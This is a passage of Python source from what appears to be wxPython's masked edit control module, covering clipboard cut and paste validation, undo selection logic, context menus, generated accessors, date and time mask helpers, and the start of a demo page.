Used to override the default Cut() method in base controls, instead
copying the selection to the clipboard and then blanking the selection,
leaving only the mask in the selected area behind.
Note: _Cut (read "undercut" ;-) must be called from a Cut() override in the
derived control because the mixin functions can't override a method of
a sibling class.
"""
## dbg("MaskedEditMixin::_Cut", indent=1)
value = self._GetValue()
## dbg('current value: "%s"' % value)
sel_start, sel_to = self._GetSelection() ## check for a range of selected text
## dbg('selected text: "%s"' % value[sel_start:sel_to].strip())
do = wx.TextDataObject()
do.SetText(value[sel_start:sel_to].strip())
wx.TheClipboard.Open()
wx.TheClipboard.SetData(do)
wx.TheClipboard.Close()
if sel_to - sel_start != 0:
self._OnErase()
## dbg(indent=0)
# WS Note: overriding Copy is no longer necessary given that you
# can no longer select beyond the last non-empty char in the control.
#
## def _Copy( self ):
## """
## Override the wx.TextCtrl's .Copy function, with our own
## that does validation. Need to strip trailing spaces.
## """
## sel_start, sel_to = self._GetSelection()
## select_len = sel_to - sel_start
## textval = wx.TextCtrl._GetValue(self)
##
## do = wx.TextDataObject()
## do.SetText(textval[sel_start:sel_to].strip())
## wx.TheClipboard.Open()
## wx.TheClipboard.SetData(do)
## wx.TheClipboard.Close()
def _getClipboardContents( self ):
""" Subroutine for getting the current contents of the clipboard.
"""
do = wx.TextDataObject()
wx.TheClipboard.Open()
success = wx.TheClipboard.GetData(do)
wx.TheClipboard.Close()
if not success:
return None
else:
# Remove leading and trailing spaces before evaluating contents
return do.GetText().strip()
def _validatePaste(self, paste_text, sel_start, sel_to, raise_on_invalid=False):
"""
Used by paste routine and field choice validation to see
if a given slice of paste text is legal for the area in question:
returns validity, replacement text, and extent of paste in
template.
"""
## dbg(suspend=1)
## dbg('MaskedEditMixin::_validatePaste("%(paste_text)s", %(sel_start)d, %(sel_to)d), raise_on_invalid? %(raise_on_invalid)d' % locals(), indent=1)
select_length = sel_to - sel_start
maxlength = select_length
## dbg('sel_to - sel_start:', maxlength)
if maxlength == 0:
maxlength = self._masklength - sel_start
item = 'control'
else:
item = 'selection'
## dbg('maxlength:', maxlength)
if 'unicode' in wx.PlatformInfo and type(paste_text) != types.UnicodeType:
paste_text = paste_text.decode(self._defaultEncoding)
length_considered = len(paste_text)
if length_considered > maxlength:
## dbg('paste text will not fit into the %s:' % item, indent=0)
if raise_on_invalid:
## dbg(indent=0, suspend=0)
if item == 'control':
ve = ValueError('"%s" will not fit into the control "%s"' % (paste_text, self.name))
ve.value = paste_text
raise ve
else:
ve = ValueError('"%s" will not fit into the selection' % paste_text)
ve.value = paste_text
raise ve
else:
## dbg(indent=0, suspend=0)
return False, None, None
text = self._template
## dbg('length_considered:', length_considered)
valid_paste = True
replacement_text = ""
replace_to = sel_start
i = 0
while valid_paste and i < length_considered and replace_to < self._masklength:
if paste_text[i:] == self._template[replace_to:length_considered]:
# remainder of paste matches template; skip char-by-char analysis
## dbg('remainder paste_text[%d:] (%s) matches template[%d:%d]' % (i, paste_text[i:], replace_to, length_considered))
replacement_text += paste_text[i:]
replace_to = i = length_considered
continue
# else:
char = paste_text[i]
field = self._FindField(replace_to)
if not field._compareNoCase:
if field._forceupper: char = char.upper()
elif field._forcelower: char = char.lower()
## dbg('char:', "'"+char+"'", 'i =', i, 'replace_to =', replace_to)
## dbg('self._isTemplateChar(%d)?' % replace_to, self._isTemplateChar(replace_to))
if not self._isTemplateChar(replace_to) and self._isCharAllowed( char, replace_to, allowAutoSelect=False, ignoreInsertRight=True):
replacement_text += char
## dbg("not template(%(replace_to)d) and charAllowed('%(char)s',%(replace_to)d)" % locals())
## dbg("replacement_text:", '"'+replacement_text+'"')
i += 1
replace_to += 1
elif( char == self._template[replace_to]
or (self._signOk and
( (i == 0 and (char == '-' or (self._useParens and char == '(')))
or (i == self._masklength - 1 and self._useParens and char == ')') ) ) ):
replacement_text += char
## dbg("'%(char)s' == template(%(replace_to)d)" % locals())
## dbg("replacement_text:", '"'+replacement_text+'"')
i += 1
replace_to += 1
else:
next_entry = self._findNextEntry(replace_to, adjustInsert=False)
if next_entry == replace_to:
valid_paste = False
else:
replacement_text += self._template[replace_to:next_entry]
## dbg("skipping template; next_entry =", next_entry)
## dbg("replacement_text:", '"'+replacement_text+'"')
replace_to = next_entry # so next_entry will be considered on next loop
if not valid_paste and raise_on_invalid:
## dbg('raising exception', indent=0, suspend=0)
ve = ValueError('"%s" cannot be inserted into the control "%s"' % (paste_text, self.name))
ve.value = paste_text
raise ve
elif i < len(paste_text):
valid_paste = False
if raise_on_invalid:
## dbg('raising exception', indent=0, suspend=0)
ve = ValueError('"%s" will not fit into the control "%s"' % (paste_text, self.name))
ve.value = paste_text
raise ve
## dbg('valid_paste?', valid_paste)
if valid_paste:
## dbg('replacement_text: "%s"' % replacement_text, 'replace to:', replace_to)
pass
## dbg(indent=0, suspend=0)
return valid_paste, replacement_text, replace_to
def _Paste( self, value=None, raise_on_invalid=False, just_return_value=False ):
"""
Used to override the base control's .Paste() function,
with our own that does validation.
Note: _Paste must be called from a Paste() override in the
derived control because the mixin functions can't override a
method of a sibling class.
"""
## dbg('MaskedEditMixin::_Paste (value = "%s")' % value, indent=1)
if value is None:
paste_text = self._getClipboardContents()
else:
paste_text = value
if paste_text is not None:
if 'unicode' in wx.PlatformInfo and type(paste_text) != types.UnicodeType:
paste_text = paste_text.decode(self._defaultEncoding)
## dbg('paste text: "%s"' % paste_text)
# (conversion will raise ValueError if paste isn't legal)
sel_start, sel_to = self._GetSelection()
## dbg('selection:', (sel_start, sel_to))
# special case: handle allowInsert fields properly
field = self._FindField(sel_start)
edit_start, edit_end = field._extent
new_pos = None
if field._allowInsert and sel_to <= edit_end and (sel_start + len(paste_text) < edit_end or field._insertRight):
if field._insertRight:
# want to paste to the left; see if it will fit:
left_text = self._GetValue()[edit_start:sel_start].lstrip()
## dbg('len(left_text):', len(left_text))
## dbg('len(paste_text):', len(paste_text))
## dbg('sel_start - (len(left_text) + len(paste_text)) >= edit_start?', sel_start - (len(left_text) + len(paste_text)) >= edit_start)
if sel_start - (len(left_text) - (sel_to - sel_start) + len(paste_text)) >= edit_start:
# will fit! create effective paste text, and move cursor back to do so:
paste_text = left_text + paste_text
sel_start -= len(left_text)
paste_text = paste_text.rjust(sel_to - sel_start)
## dbg('modified paste_text to be: "%s"' % paste_text)
## dbg('modified selection to:', (sel_start, sel_to))
else:
## dbg("won't fit left;", 'paste text remains: "%s"' % paste_text)
pass
else:
paste_text = paste_text + self._GetValue()[sel_to:edit_end].rstrip()
## dbg("allow insert, but not insert right;", 'paste text set to: "%s"' % paste_text)
new_pos = sel_start + len(paste_text) # store for subsequent positioning
## dbg('paste within insertable field; adjusted paste_text: "%s"' % paste_text, 'end:', edit_end)
## dbg('expanded selection to:', (sel_start, sel_to))
# Another special case: paste won't fit, but it's a right-insert field where entire
# non-empty value is selected, and there's room if the selection is expanded leftward:
if( len(paste_text) > sel_to - sel_start
and field._insertRight
and sel_start > edit_start
and sel_to >= edit_end
and not self._GetValue()[edit_start:sel_start].strip() ):
# text won't fit within selection, but left of selection is empty;
# check to see if we can expand selection to accommodate the value:
empty_space = sel_start - edit_start
amount_needed = len(paste_text) - (sel_to - sel_start)
if amount_needed <= empty_space:
sel_start -= amount_needed
## dbg('expanded selection to:', (sel_start, sel_to))
# another special case: deal with signed values properly:
if self._signOk:
signedvalue, signpos, right_signpos = self._getSignedValue()
paste_signpos = paste_text.find('-')
if paste_signpos == -1:
paste_signpos = paste_text.find('(')
# if paste text will result in signed value:
#### dbg('paste_signpos != -1?', paste_signpos != -1)
#### dbg('sel_start:', sel_start, 'signpos:', signpos)
#### dbg('field._insertRight?', field._insertRight)
#### dbg('sel_start - len(paste_text) >= signpos?', sel_start - len(paste_text) <= signpos)
if paste_signpos != -1 and (sel_start <= signpos
or (field._insertRight and sel_start - len(paste_text) <= signpos)):
signed = True
else:
signed = False
# remove "sign" from paste text, so we can auto-adjust for sign type after paste:
paste_text = paste_text.replace('-', ' ').replace('(',' ').replace(')','')
## dbg('unsigned paste text: "%s"' % paste_text)
else:
signed = False
# another special case: deal with insert-right fields when selection is empty and
# cursor is at end of field:
#### dbg('field._insertRight?', field._insertRight)
#### dbg('sel_start == edit_end?', sel_start == edit_end)
#### dbg('sel_start', sel_start, 'sel_to', sel_to)
if field._insertRight and sel_start == edit_end and sel_start == sel_to:
sel_start -= len(paste_text)
if sel_start < 0:
sel_start = 0
## dbg('adjusted selection:', (sel_start, sel_to))
raise_on_invalid = raise_on_invalid or field._raiseOnInvalidPaste
try:
valid_paste, replacement_text, replace_to = self._validatePaste(paste_text, sel_start, sel_to, raise_on_invalid)
except:
## dbg('exception thrown', indent=0)
raise
if not valid_paste:
## dbg('paste text not legal for the selection or portion of the control following the cursor;')
if not wx.Validator_IsSilent():
wx.Bell()
## dbg(indent=0)
return None, -1
# else...
text = self._eraseSelection()
new_text = text[:sel_start] + replacement_text + text[replace_to:]
if new_text:
new_text = string.ljust(new_text,self._masklength)
if signed:
new_text, signpos, right_signpos = self._getSignedValue(candidate=new_text)
if new_text:
if self._useParens:
new_text = new_text[:signpos] + '(' + new_text[signpos+1:right_signpos] + ')' + new_text[right_signpos+1:]
else:
new_text = new_text[:signpos] + '-' + new_text[signpos+1:]
if not self._isNeg:
self._isNeg = 1
## dbg("new_text:", '"'+new_text+'"')
if not just_return_value:
if new_text != self._GetValue():
self.modified = True
if new_text == '':
self.ClearValue()
else:
wx.CallAfter(self._SetValue, new_text)
if new_pos is None:
new_pos = sel_start + len(replacement_text)
wx.CallAfter(self._SetInsertionPoint, new_pos)
else:
## dbg(indent=0)
return new_text, replace_to
elif just_return_value:
## dbg(indent=0)
return self._GetValue(), sel_to
## dbg(indent=0)
def _Undo(self, value=None, prev=None, just_return_results=False):
""" Provides an Undo() method in base controls. """
## dbg("MaskedEditMixin::_Undo", indent=1)
if value is None:
value = self._GetValue()
if prev is None:
prev = self._prevValue
## dbg('current value: "%s"' % value)
## dbg('previous value: "%s"' % prev)
if prev is None:
## dbg('no previous value', indent=0)
return
elif value != prev:
# Determine what to select: (relies on fixed-length strings)
# (This is a lot harder than it would first appear, because
# of mask chars that stay fixed, and so break up the "diff"...)
# Determine where they start to differ:
i = 0
length = len(value) # (both are same length in masked control)
while( value[:i] == prev[:i] ):
i += 1
sel_start = i - 1
# handle signed values carefully, so undo from signed to unsigned or vice-versa
# works properly:
if self._signOk:
text, signpos, right_signpos = self._getSignedValue(candidate=prev)
if self._useParens:
if prev[signpos] == '(' and prev[right_signpos] == ')':
self._isNeg = True
else:
self._isNeg = False
# eliminate source of "far-end" undo difference if using balanced parens:
value = value.replace(')', ' ')
prev = prev.replace(')', ' ')
elif prev[signpos] == '-':
self._isNeg = True
else:
self._isNeg = False
# Determine where they stop differing in "undo" result:
sm = difflib.SequenceMatcher(None, a=value, b=prev)
i, j, k = sm.find_longest_match(sel_start, length, sel_start, length)
## dbg('i,j,k = ', (i,j,k), 'value[i:i+k] = "%s"' % value[i:i+k], 'prev[j:j+k] = "%s"' % prev[j:j+k] )
if k == 0: # no match found; select to end
sel_to = length
else:
code_5tuples = sm.get_opcodes()
for op, i1, i2, j1, j2 in code_5tuples:
## dbg("%7s value[%d:%d] (%s) prev[%d:%d] (%s)" % (op, i1, i2, value[i1:i2], j1, j2, prev[j1:j2]))
pass
diff_found = False
# look backward through operations needed to produce "previous" value;
# first change wins:
for next_op in range(len(code_5tuples)-1, -1, -1):
op, i1, i2, j1, j2 = code_5tuples[next_op]
## dbg('value[i1:i2]: "%s"' % value[i1:i2], 'template[i1:i2] "%s"' % self._template[i1:i2])
field = self._FindField(i2)
if op == 'insert' and prev[j1:j2] != self._template[j1:j2]:
## dbg('insert found: selection =>', (j1, j2))
sel_start = j1
sel_to = j2
diff_found = True
break
elif op == 'delete' and value[i1:i2] != self._template[i1:i2]:
edit_start, edit_end = field._extent
if field._insertRight and (field._allowInsert or i2 == edit_end):
sel_start = i2
sel_to = i2
else:
sel_start = i1
sel_to = j1
## dbg('delete found: selection =>', (sel_start, sel_to))
diff_found = True
break
elif op == 'replace':
if not prev[i1:i2].strip() and field._insertRight:
sel_start = sel_to = j2
else:
sel_start = j1
sel_to = j2
## dbg('replace found: selection =>', (sel_start, sel_to))
diff_found = True
break
if diff_found:
# now go forwards, looking for earlier changes:
## dbg('searching forward...')
for next_op in range(len(code_5tuples)):
op, i1, i2, j1, j2 = code_5tuples[next_op]
field = self._FindField(i1)
if op == 'equal':
continue
elif op == 'replace':
if field._insertRight:
# if replace with spaces in an insert-right control, ignore "forward" replace
if not prev[i1:i2].strip():
continue
elif j1 < i1:
## dbg('setting sel_start to', j1)
sel_start = j1
else:
## dbg('setting sel_start to', i1)
sel_start = i1
else:
## dbg('setting sel_start to', i1)
sel_start = i1
## dbg('saw replace; breaking')
break
elif op == 'insert' and not value[i1:i2]:
## dbg('forward %s found' % op)
if prev[j1:j2].strip():
## dbg('item to insert non-empty; setting sel_start to', j1)
sel_start = j1
break
elif not field._insertRight:
## dbg('setting sel_start to inserted space:', j1)
sel_start = j1
break
elif op == 'delete':
## dbg('delete; field._insertRight?', field._insertRight, 'value[%d:%d].lstrip: "%s"' % (i1,i2,value[i1:i2].lstrip()))
if field._insertRight:
if value[i1:i2].lstrip():
## dbg('setting sel_start to ', j1)
sel_start = j1
## dbg('breaking loop')
break
else:
continue
else:
## dbg('saw delete; breaking')
break
else:
## dbg('unknown code!')
# we've got what we need
break
if not diff_found:
## dbg('no insert,delete or replace found (!)')
# do "left-insert"-centric processing of difference based on l.c.s.:
if i == j and j != sel_start: # match starts after start of selection
sel_to = sel_start + (j-sel_start) # select to start of match
else:
sel_to = j # (change ends at j)
# There are several situations where the calculated difference is
# not what we want to select. If changing sign, or just adding
# group characters, we really don't want to highlight the characters
# changed, but instead leave the cursor where it is.
# Also, there a situations in which the difference can be ambiguous;
# Consider:
#
# current value: 11234
# previous value: 1111234
#
# Where did the cursor actually lie and which 1s were selected on the delete
# operation?
#
# Also, difflib can "get it wrong;" Consider:
#
# current value: " 128.66"
# previous value: " 121.86"
#
# difflib produces the following opcodes, which are sub-optimal:
# equal value[0:9] ( 12) prev[0:9] ( 12)
# insert value[9:9] () prev[9:11] (1.)
# equal value[9:10] (8) prev[11:12] (8)
# delete value[10:11] (.) prev[12:12] ()
# equal value[11:12] (6) prev[12:13] (6)
# delete value[12:13] (6) prev[13:13] ()
#
# This should have been:
# equal value[0:9] ( 12) prev[0:9] ( 12)
# replace value[9:11] (8.6) prev[9:11] (1.8)
# equal value[12:13] (6) prev[12:13] (6)
#
# But it didn't figure this out!
#
# To get all this right, we use the previous selection recorded to help us...
if (sel_start, sel_to) != self._prevSelection:
## dbg('calculated selection', (sel_start, sel_to), "doesn't match previous", self._prevSelection)
prev_sel_start, prev_sel_to = self._prevSelection
field = self._FindField(sel_start)
if( self._signOk
and sel_start < self._masklength
and (prev[sel_start] in ('-', '(', ')')
or value[sel_start] in ('-', '(', ')')) ):
# change of sign; leave cursor alone...
## dbg("prev[sel_start] in ('-', '(', ')')?", prev[sel_start] in ('-', '(', ')'))
## dbg("value[sel_start] in ('-', '(', ')')?", value[sel_start] in ('-', '(', ')'))
## dbg('setting selection to previous one')
sel_start, sel_to = self._prevSelection
elif field._groupdigits and (value[sel_start:sel_to] == field._groupChar
or prev[sel_start:sel_to] == field._groupChar):
# do not highlight grouping changes
## dbg('value[sel_start:sel_to] == field._groupChar?', value[sel_start:sel_to] == field._groupChar)
## dbg('prev[sel_start:sel_to] == field._groupChar?', prev[sel_start:sel_to] == field._groupChar)
## dbg('setting selection to previous one')
sel_start, sel_to = self._prevSelection
else:
calc_select_len = sel_to - sel_start
prev_select_len = prev_sel_to - prev_sel_start
## dbg('sel_start == prev_sel_start', sel_start == prev_sel_start)
## dbg('sel_to > prev_sel_to', sel_to > prev_sel_to)
if prev_select_len >= calc_select_len:
# old selection was bigger; trust it:
## dbg('prev_select_len >= calc_select_len?', prev_select_len >= calc_select_len)
if not field._insertRight:
## dbg('setting selection to previous one')
sel_start, sel_to = self._prevSelection
else:
sel_to = self._prevSelection[1]
## dbg('setting selection to', (sel_start, sel_to))
elif( sel_to > prev_sel_to # calculated select past last selection
and prev_sel_to < len(self._template) # and prev_sel_to not at end of control
and sel_to == len(self._template) ): # and calculated selection goes to end of control
i, j, k = sm.find_longest_match(prev_sel_to, length, prev_sel_to, length)
## dbg('i,j,k = ', (i,j,k), 'value[i:i+k] = "%s"' % value[i:i+k], 'prev[j:j+k] = "%s"' % prev[j:j+k] )
if k > 0:
# difflib must not have optimized opcodes properly;
sel_to = j
else:
# look for possible ambiguous diff:
# if last change resulted in no selection, test from resulting cursor position:
if prev_sel_start == prev_sel_to:
calc_select_len = sel_to - sel_start
field = self._FindField(prev_sel_start)
# determine which way to search from last cursor position for ambiguous change:
if field._insertRight:
test_sel_start = prev_sel_start
test_sel_to = prev_sel_start + calc_select_len
else:
test_sel_start = prev_sel_start - calc_select_len
test_sel_to = prev_sel_start
else:
test_sel_start, test_sel_to = prev_sel_start, prev_sel_to
## dbg('test selection:', (test_sel_start, test_sel_to))
## dbg('calc change: "%s"' % prev[sel_start:sel_to])
## dbg('test change: "%s"' % prev[test_sel_start:test_sel_to])
# if calculated selection spans characters, and same characters
# "before" the previous insertion point are present there as well,
# select the ones related to the last known selection instead.
if( sel_start != sel_to
and test_sel_to < len(self._template)
and prev[test_sel_start:test_sel_to] == prev[sel_start:sel_to] ):
sel_start, sel_to = test_sel_start, test_sel_to
# finally, make sure that the old and new values are
# different where we say they're different:
while( sel_to - 1 > 0
and sel_to > sel_start
and value[sel_to-1:] == prev[sel_to-1:]):
sel_to -= 1
while( sel_start + 1 < self._masklength
and sel_start < sel_to
and value[:sel_start+1] == prev[:sel_start+1]):
sel_start += 1
## dbg('sel_start, sel_to:', sel_start, sel_to)
## dbg('previous value: "%s"' % prev)
## dbg(indent=0)
if just_return_results:
return prev, (sel_start, sel_to)
# else...
self._SetValue(prev)
self._SetInsertionPoint(sel_start)
self._SetSelection(sel_start, sel_to)
else:
## dbg('no difference between previous value')
## dbg(indent=0)
if just_return_results:
return prev, self._GetSelection()
def _OnClear(self, event):
""" Provides an action for context menu delete operation """
self.ClearValue()
def _OnContextMenu(self, event):
## dbg('MaskedEditMixin::OnContextMenu()', indent=1)
menu = wx.Menu()
menu.Append(wx.ID_UNDO, "Undo", "")
menu.AppendSeparator()
menu.Append(wx.ID_CUT, "Cut", "")
menu.Append(wx.ID_COPY, "Copy", "")
menu.Append(wx.ID_PASTE, "Paste", "")
menu.Append(wx.ID_CLEAR, "Delete", "")
menu.AppendSeparator()
menu.Append(wx.ID_SELECTALL, "Select All", "")
wx.EVT_MENU(menu, wx.ID_UNDO, self._OnCtrl_Z)
wx.EVT_MENU(menu, wx.ID_CUT, self._OnCtrl_X)
wx.EVT_MENU(menu, wx.ID_COPY, self._OnCtrl_C)
wx.EVT_MENU(menu, wx.ID_PASTE, self._OnCtrl_V)
wx.EVT_MENU(menu, wx.ID_CLEAR, self._OnClear)
wx.EVT_MENU(menu, wx.ID_SELECTALL, self._OnCtrl_A)
# ## WSS: The base control apparently handles
# enable/disable of wx.ID_CUT, wx.ID_COPY, wx.ID_PASTE
# and wx.ID_CLEAR menu items even if the menu is one
# we created. However, it doesn't do undo properly,
# so we're keeping track of previous values ourselves.
# Therefore, we have to override the default update for
# that item on the menu:
wx.EVT_UPDATE_UI(self, wx.ID_UNDO, self._UndoUpdateUI)
self._contextMenu = menu
self.PopupMenu(menu, event.GetPosition())
menu.Destroy()
self._contextMenu = None
## dbg(indent=0)
def _UndoUpdateUI(self, event):
if self._prevValue is None or self._prevValue == self._curValue:
self._contextMenu.Enable(wx.ID_UNDO, False)
else:
self._contextMenu.Enable(wx.ID_UNDO, True)
def _OnCtrlParametersChanged(self):
"""
Overridable function to allow derived classes to take action as a
result of parameter changes prior to possibly changing the value
of the control.
"""
pass
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class MaskedEditAccessorsMixin:
"""
To avoid a ton of boiler-plate, and to automate the getter/setter generation
for each valid control parameter so we never forget to add the functions when
adding parameters, this class programmatically adds the masked edit mixin
parameters to itself.
(This makes it easier for Designers like Boa to deal with masked controls.)
To further complicate matters, this is done with an extra level of inheritance,
so that "general" classes like masked.TextCtrl can have all possible attributes,
while derived classes, like masked.TimeCtrl and masked.NumCtrl can prevent
exposure of those optional attributes of their base class that do not make
sense for their derivation.
Therefore, we define:
BaseMaskedTextCtrl(TextCtrl, MaskedEditMixin)
and
masked.TextCtrl(BaseMaskedTextCtrl, MaskedEditAccessorsMixin).
This allows us to then derive:
masked.NumCtrl( BaseMaskedTextCtrl )
and not have to expose all the same accessor functions for the
derived control when they don't all make sense for it.
"""
# Define the default set of attributes exposed by the most generic masked controls:
exposed_basectrl_params = MaskedEditMixin.valid_ctrl_params.keys() + Field.valid_params.keys()
exposed_basectrl_params.remove('index')
exposed_basectrl_params.remove('extent')
exposed_basectrl_params.remove('foregroundColour') # (base class already has this)
for param in exposed_basectrl_params:
propname = param[0].upper() + param[1:]
exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
if param.find('Colour') != -1:
# add non-british spellings, for backward-compatibility
propname.replace('Colour', 'Color')
exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## these are helper subroutines:
def _movetofloat( origvalue, fmtstring, neg, addseparators=False, sepchar = ',',fillchar=' '):
""" addseparators = add separator character every three numerals if True
"""
fmt0 = fmtstring.split('.')
fmt1 = fmt0[0]
fmt2 = fmt0[1]
val = origvalue.split('.')[0].strip()
ret = fillchar * (len(fmt1)-len(val)) + val + "." + "0" * len(fmt2)
if neg:
ret = '-' + ret[1:]
return (ret,len(fmt1))
def _isDateType( fmtstring ):
""" Checks the mask and returns True if it fits an allowed
date or datetime format.
"""
dateMasks = ("^##/##/####",
"^##-##-####",
"^##.##.####",
"^####/##/##",
"^####-##-##",
"^####.##.##",
"^##/CCC/####",
"^##.CCC.####",
"^##/##/##$",
"^##/##/## ",
"^##/CCC/##$",
"^##.CCC.## ",)
reString = "|".join(dateMasks)
filter = re.compile( reString)
if re.match(filter,fmtstring): return True
return False
def _isTimeType( fmtstring ):
""" Checks the mask and returns True if it fits an allowed
time format.
"""
reTimeMask = "^##:##(:##)?( (AM|PM))?"
filter = re.compile( reTimeMask )
if re.match(filter,fmtstring): return True
return False
def _isFloatingPoint( fmtstring):
filter = re.compile("[ ]?[#]+\.[#]+\n")
if re.match(filter,fmtstring+"\n"): return True
return False
def _isInteger( fmtstring ):
filter = re.compile("[#]+\n")
if re.match(filter,fmtstring+"\n"): return True
return False
def _getDateParts( dateStr, dateFmt ):
if len(dateStr) > 11: clip = dateStr[0:11]
else: clip = dateStr
if clip[-2] not in string.digits:
clip = clip[:-1] # (got part of time; drop it)
dateSep = (('/' in clip) * '/') + (('-' in clip) * '-') + (('.' in clip) * '.')
slices = clip.split(dateSep)
if dateFmt == "MDY":
y,m,d = (slices[2],slices[0],slices[1]) ## year, month, date parts
elif dateFmt == "DMY":
y,m,d = (slices[2],slices[1],slices[0]) ## year, month, date parts
elif dateFmt == "YMD":
y,m,d = (slices[0],slices[1],slices[2]) ## year, month, date parts
else:
y,m,d = None, None, None
if not y:
return None
else:
return y,m,d
def _getDateSepChar(dateStr):
clip = dateStr[0:10]
dateSep = (('/' in clip) * '/') + (('-' in clip) * '-') + (('.' in clip) * '.')
return dateSep
def _makeDate( year, month, day, dateFmt, dateStr):
sep = _getDateSepChar( dateStr)
if dateFmt == "MDY":
return "%s%s%s%s%s" % (month,sep,day,sep,year) ## year, month, date parts
elif dateFmt == "DMY":
return "%s%s%s%s%s" % (day,sep,month,sep,year) ## year, month, date parts
elif dateFmt == "YMD":
return "%s%s%s%s%s" % (year,sep,month,sep,day) ## year, month, date parts
else:
return none
def _getYear(dateStr,dateFmt):
parts = _getDateParts( dateStr, dateFmt)
return parts[0]
def _getMonth(dateStr,dateFmt):
parts = _getDateParts( dateStr, dateFmt)
return parts[1]
def _getDay(dateStr,dateFmt):
parts = _getDateParts( dateStr, dateFmt)
return parts[2]
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class __test(wx.PySimpleApp):
def OnInit(self):
from wx.lib.rcsizer import RowColSizer
self.frame = wx.Frame( None, -1, "MaskedEditMixin 0.0.7 Demo Page #1", size = (700,600))
self.panel = wx.Panel( self.frame, -1)
self.sizer = RowColSizer()
self.labels = []
self.editList = []
rowcount = 4
id, id1 = wx.NewId(), wx.NewId()
self.command1 = wx.Button( self.panel, id, "&Close" )
self.command2 = wx.Button( self.panel, id1, "&AutoFormats" )
self.sizer.Add(self.command1, row=0, col=0, flag=wx.ALL, border = 5)
self.sizer.Add(self.command2, row=0, col=1, colspan=2, flag=wx.ALL, border = 5)
self.panel.Bind(wx.EVT_BUTTON, self.onClick, self.command1 )
## self.panel.SetDefaultItem(self.command1 )
self.panel.Bind(wx.EVT_BUTTON, self.onClickPage, self.command2)
self.check1 = wx.CheckBox( self.panel, -1, "Disallow Empty" )
self.check2 = wx.CheckBox( self.panel, -1, "Highlight Empty" )
self.sizer.Add( self.check1, row=0,col=3, flag=wx.ALL,border=5 )
self.sizer.Add( self.check2, row=0,col=4, flag=wx.ALL,border=5 )
self.panel.Bind(wx.EVT_CHECKBOX, self._onCheck1, self.check1 )
self.panel.Bind(wx.EVT_CHECKBOX, self._onCheck2, self.check2 )
label = """Press ctrl-s in any field to output the value and plain value. Press ctrl-x to clear and re-set any field.
Note that all controls have been auto-sized by including F in the format code.
Try entering nonsensical or partial values in validated fields to see what happens (use ctrl-s to test the valid status)."""
label2 = "\nNote that the State and Last Name fields are list-limited (Name:Smith,Jones,Williams)."
self.label1 = wx.StaticText( self.panel, -1, label)
self.label2 = wx.StaticText( self.panel, -1, "Description")
self.label3 = wx.StaticText( self.panel, -1, "Mask Value")
self.label4 = wx.StaticText( self.panel, -1, "Format")
self.label5 = wx.StaticText( self.panel, -1, "Reg Expr Val. (opt)")
self.label6 = wx.StaticText( self.panel, -1, "MaskedEdit Ctrl")
self.label7 = wx.StaticText( self.panel, -1, label2)
self.label7.SetForegroundColour("Blue")
self.label1.SetForegroundColour("Blue")
self.label2.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label3.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label4.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label5.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label6.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.sizer.Add( self.label1, row=1,col=0,colspan=7, flag=wx.ALL,border=5)
self.sizer.Add( self.label7, row=2,col=0,colspan=7, flag=wx.ALL,border=5)
self.sizer.Add( self.label2, row=3,col=0, flag=wx.ALL,border=5)
self.sizer.Add( self.label3, row=3,col=1, flag=wx.ALL,border=5)
self.sizer.Add( self.label4, row=3,col=2, flag=wx.ALL,border=5)
self.sizer.Add( self.label5, row=3,col=3, flag=wx.ALL,border=5)
self.sizer.Add( self.label6, row=3,col=4, flag=wx.ALL,border=5)
# The following list is of the controls for the demo. Feel free to play around with
# the options!
controls = [
#description mask excl format regexp range,list,initial
("Phone No", "(###) ###-#### x:###", "", 'F!^-R', "^\(\d\d\d\) \d\d\d-\d\d\d\d", (),[],''),
("Last Name Only", "C{14}", "", 'F {list}', '^[A-Z][a-zA-Z]+', (),('Smith','Jones','Williams'),''),
("Full Name", "C{14}", "", 'F_', '^[A-Z][a-zA-Z]+ [A-Z][a-zA-Z]+', (),[],''),
("Social Sec#", "###-##-####", "", 'F', "\d{3}-\d{2}-\d{4}", (),[],''),
("U.S. Zip+4", "#{5}-#{4}", "", 'F', "\d{5}-(\s{4}|\d{4})",(),[],''),
("U.S. State (2 char)\n(with default)","AA", "", 'F!', "[A-Z]{2}", (),states, 'AZ'),
("Customer No", "\CAA-###", "", 'F!', "C[A-Z]{2}-\d{3}", (),[],''),
("Date (MDY) + Time\n(with default)", "##/##/#### ##:## AM", 'BCDEFGHIJKLMNOQRSTUVWXYZ','DFR!',"", (),[], r'03/05/2003 12:00 AM'),
("Invoice Total", "#{9}.##", "", 'F-R,', "", (),[], ''),
("Integer (signed)\n(with default)", "#{6}", "", 'F-R', "", (),[], '0 '),
("Integer (unsigned)\n(with default), 1-399", "######", "", 'F', "", (1,399),[], '1 '),
("Month selector", "XXX", "", 'F', "", (),
['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'],""),
("fraction selector","#/##", "", 'F', "^\d\/\d\d?", (),
['2/3', '3/4', '1/2', '1/4', '1/8', '1/16', '1/32', '1/64'], "")
]
for control in controls:
self.sizer.Add( wx.StaticText( self.panel, -1, control[0]),row=rowcount, col=0,border=5,flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[1]),row=rowcount, col=1,border=5, flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[3]),row=rowcount, col=2,border=5, flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[4][:20]),row=rowcount, col=3,border=5, flag=wx.ALL)
if control in controls[:]:#-2]:
newControl = MaskedTextCtrl( self.panel, -1, "",
mask = control[1],
excludeChars = control[2],
formatcodes = control[3],
includeChars = "",
validRegex = control[4],
validRange = control[5],
choices = control[6],
defaultValue = control[7],
demo = True)
